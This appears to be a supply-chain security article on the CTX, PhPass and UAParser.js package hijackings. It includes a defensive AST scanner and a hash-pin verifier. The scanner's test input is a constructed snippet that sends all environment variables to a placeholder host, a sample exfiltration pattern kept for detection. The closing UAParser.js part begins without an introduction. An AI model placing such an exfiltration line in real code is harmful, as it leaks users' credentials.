A recent example of repository hijacking came in May 2022 in the form of the Python package CTX, whose repository was hijacked on the popular Python package hosting site PyPI. In this case, the domain that hosted the owner account's email address expired, leaving the account open to domain reregistration by a third party followed by a password reset. It is unclear how much time elapsed between the expiry and the successful hijacking attempt, but once the hijack was initiated, it took the attacker just 40 minutes to begin uploading malicious versions of the package, replacing the original versions.
This takeover went undiscovered for 10 days. During that time, malicious versions of CTX were downloaded over 27,000 times.
As for the malicious code, a section of code was added to the ctx.py file that exfiltrated the user's environment variables and sent the data to an external endpoint, in this case a hosted Heroku server. The exfiltrated data potentially included sensitive user information, such as API keys and passwords, which are commonly stored as environment variables and were therefore easily accessible.
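The behaviour described above, reading the whole environment and handing it to an outbound HTTP call, is easy to spot statically once a package's source is on disk. The following scanner is an added example, not code from the advisory or from the CTX project: it walks a Python module's AST, records every read of `os.environ`/`os.getenv` and every call into a network library, and flags a file that does both. The two embedded inputs are constructed samples (the "suspicious" one mimics the pattern with a placeholder URL, not the real endpoint), and the set of network prefixes is an assumption you should extend for the libraries in your own dependency tree.

```python
import ast
import sys

# Constructed sample modelled on the behaviour the advisory describes:
# read every environment variable and post it to a remote endpoint.
# The URL is a placeholder, not the real exfiltration endpoint.
SUSPICIOUS_SAMPLE = '''
import os
import requests

def _send():
    payload = dict(os.environ)
    requests.post("https://example.invalid/collect", json=payload)
'''

# Constructed benign sample: reads one variable, never touches the network.
BENIGN_SAMPLE = '''
import os

def config_dir():
    return os.environ.get("CTX_HOME", "~/.ctx")
'''

ENV_PREFIXES = ("os.environ", "os.getenv")
# Assumed list of outbound-network entry points; extend for your own stack.
NETWORK_PREFIXES = ("requests.", "urllib.request.urlopen", "http.client.",
                    "socket.", "httpx.", "urllib3.")


def dotted(node):
    """Turn an Attribute/Name chain such as `a.b.c` into the string 'a.b.c'."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def scan_source(source, filename="<string>"):
    """Report env-var reads and network calls in one module; suspicious if both occur."""
    tree = ast.parse(source, filename)

    # Resolve `import requests as r` / `from os import environ as e` so the
    # aliased names still map back to the real module path.
    aliases = {}
    for node in ast.walk(tree):
        if isinstance(node, ast.ImportFrom) and node.module:
            for alias in node.names:
                aliases[alias.asname or alias.name] = f"{node.module}.{alias.name}"
        elif isinstance(node, ast.Import):
            for alias in node.names:
                aliases[alias.asname or alias.name] = alias.name

    def resolve(name):
        head, _, rest = name.partition(".")
        head = aliases.get(head, head)
        return head + ("." + rest if rest else "")

    env_lines, net_lines = set(), set()
    for node in ast.walk(tree):
        if isinstance(node, (ast.Attribute, ast.Name)):
            name = dotted(node)
            if name and resolve(name).startswith(ENV_PREFIXES):
                env_lines.add(node.lineno)
        if isinstance(node, ast.Call):
            name = dotted(node.func)
            if name and resolve(name).startswith(NETWORK_PREFIXES):
                net_lines.add(node.lineno)

    return {
        "file": filename,
        "env_reads": sorted(env_lines),
        "network_calls": sorted(net_lines),
        "suspicious": bool(env_lines) and bool(net_lines),
    }


def main(paths):
    """Scan each .py file given on the command line and print the flagged ones."""
    for path in paths:
        with open(path, encoding="utf-8") as fh:
            report = scan_source(fh.read(), path)
        if report["suspicious"]:
            print(f"{path}: env reads at {report['env_reads']}, "
                  f"network calls at {report['network_calls']}")


if __name__ == "__main__":
    main(sys.argv[1:])
```

Run it over an unpacked wheel or sdist (`python scan.py $(find ctx-*/ -name '*.py')`) before the package is allowed into a build. A hit is a review prompt rather than proof of malice, since legitimate clients do read tokens from the environment and send them somewhere, but a package that had no reason to do so in its previous release is exactly the diff this check surfaces.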
PyPI administrators moved quickly to suspend the hijacked account and remove all versions, malicious and original, of CTX, which at the time of this writing has not been reinstated.
This vulnerability was covered in Black Duck® Security Advisory BDSA-2022-1523.
Similarly, PHP package PhPass, which is hosted on the Packagist PHP hosting platform and GitHub, was exploited in the same way in May 2022. The original owner’s account was deleted and reregistered by a bad actor, giving access to the original repository. Using this access, original package versions were replaced with malicious versions.
The malicious code contained in these replacement versions carried out the same action as the CTX takeover—extracting environment variables to the very same endpoint.
As a solution to this issue, a forked repository was created containing the original, nonmalicious versions. To ensure no further downloads of versions on the malicious repo, Packagist rerouted the original download URL to the new fork.
This vulnerability was covered in Black Duck Security Advisory BDSA-2022-1526.
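Both the CTX and PhPass takeovers replaced existing releases rather than only adding new ones, so a version pin alone would not have protected a consumer. What does is pinning the artifact hash: a re-uploaded file under the same version number fails verification. The checker below is an added example (not tooling from Black Duck, PyPI or Packagist) for the PyPI side of that defence: it parses a `requirements.txt` with `--hash` options, then compares the digests of artifacts in a local download directory against the pins and reports mismatches, missing files and requirements that carry no hash at all. The package names, version numbers and file contents in the sample are constructed placeholders, not the real CTX releases.

```python
import hashlib
import re
import sys
from pathlib import Path

PIN_RE = re.compile(r"^([A-Za-z0-9_.\-]+)==([^\s;]+)")
HASH_RE = re.compile(r"--hash=([a-z0-9]+):([0-9a-fA-F]+)")


def parse_requirements(text):
    """Return {normalised_name: {"version": str, "hashes": {(algo, hexdigest), ...}}}."""
    pins = {}
    # Backslash continuations join a requirement with its --hash options.
    for line in text.replace("\\\n", " ").splitlines():
        line = line.split("#", 1)[0].strip()
        if not line or line.startswith("-"):
            continue  # blank, comment, or a pip option such as --index-url
        m = PIN_RE.match(line)
        if not m:
            raise ValueError(f"unpinned or unparsable requirement: {line!r}")
        name = m.group(1).lower().replace("_", "-")
        hashes = {(a.lower(), h.lower()) for a, h in HASH_RE.findall(line)}
        pins[name] = {"version": m.group(2), "hashes": hashes}
    return pins


def artifact_matches(filename, name, version):
    """True if a wheel or sdist file name belongs to name==version."""
    stem = filename.lower().replace("_", "-")
    return stem.startswith(f"{name}-{version}-") or stem.startswith(f"{name}-{version}.")


def verify_artifacts(pins, artifacts):
    """artifacts: {filename: bytes}. Returns [(name, status, detail), ...]."""
    findings = []
    for name, pin in pins.items():
        files = [f for f in artifacts if artifact_matches(f, name, pin["version"])]
        if not files:
            findings.append((name, "missing", f"no artifact for {name}=={pin['version']}"))
            continue
        if not pin["hashes"]:
            findings.append((name, "unpinned",
                             "no --hash on requirement; a replaced upload would not be detected"))
            continue
        for f in files:
            digests = {(algo, hashlib.new(algo, artifacts[f]).hexdigest())
                       for algo, _ in pin["hashes"]}
            if digests & pin["hashes"]:
                findings.append((name, "ok", f))
            else:
                findings.append((name, "MISMATCH", f"{f} does not match any pinned hash"))
    return findings


# Constructed sample data: an "original" artifact whose hash was pinned, and a
# "re-uploaded" artifact with different contents under the same version number.
GOOD_BYTES = b"constructed: original ctx-0.1.2 wheel contents"
TAMPERED_BYTES = b"constructed: re-uploaded wheel with extra code"

SAMPLE_REQUIREMENTS = (
    "ctx==0.1.2 \\\n"  # placeholder version, not a real CTX release
    f"    --hash=sha256:{hashlib.sha256(GOOD_BYTES).hexdigest()}\n"
    "somelib==1.0.0\n"  # placeholder package with no hash pin at all
)
SAMPLE_ARTIFACTS = {
    "ctx-0.1.2-py3-none-any.whl": TAMPERED_BYTES,
    "somelib-1.0.0.tar.gz": b"constructed sdist bytes",
}


def demo():
    """Run the checker over the constructed sample; the ctx wheel should fail."""
    return verify_artifacts(parse_requirements(SAMPLE_REQUIREMENTS), SAMPLE_ARTIFACTS)


def main(req_path, artifact_dir):
    """CLI: verify every file in artifact_dir against the pins in req_path."""
    pins = parse_requirements(Path(req_path).read_text(encoding="utf-8"))
    artifacts = {p.name: p.read_bytes() for p in Path(artifact_dir).iterdir() if p.is_file()}
    bad = 0
    for name, status, detail in verify_artifacts(pins, artifacts):
        print(f"{status:9} {name}: {detail}")
        bad += status in ("MISMATCH", "missing", "unpinned")
    return 1 if bad else 0


if __name__ == "__main__":
    sys.exit(main(sys.argv[1], sys.argv[2]) if len(sys.argv) == 3
             else print("\n".join(map(str, demo()))))
```

In practice the artifacts come from `pip download -r requirements.txt -d ./dl --no-deps` and the pins from `pip-compile --generate-hashes`; `pip install --require-hashes` performs the same comparison at install time. The value of running it as a separate gate is that a mismatch becomes a build failure you can alert on, rather than a package that silently changed underneath an unchanged version string.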
The code introduced in these malicious versions had particularly harmful impacts. Notably, on install, the code downloaded and executed binaries from a remote server. One such binary was cryptocurrency mining software, demonstrating that a remote attacker could take control of the victim’s system. Another binary, delivered only on Windows systems, was a trojan that exfiltrated sensitive information from the system.
Hours after the UAParser.js attack, the author of the package removed the compromised versions from npm and released three new versions (0.7.30, 0.8.1, and 1.0.1) so that projects with automatic dependency upgrades would move off the malicious versions rather than remain on them.
This vulnerability was covered in Black Duck Security Advisory BDSA-2021-3228.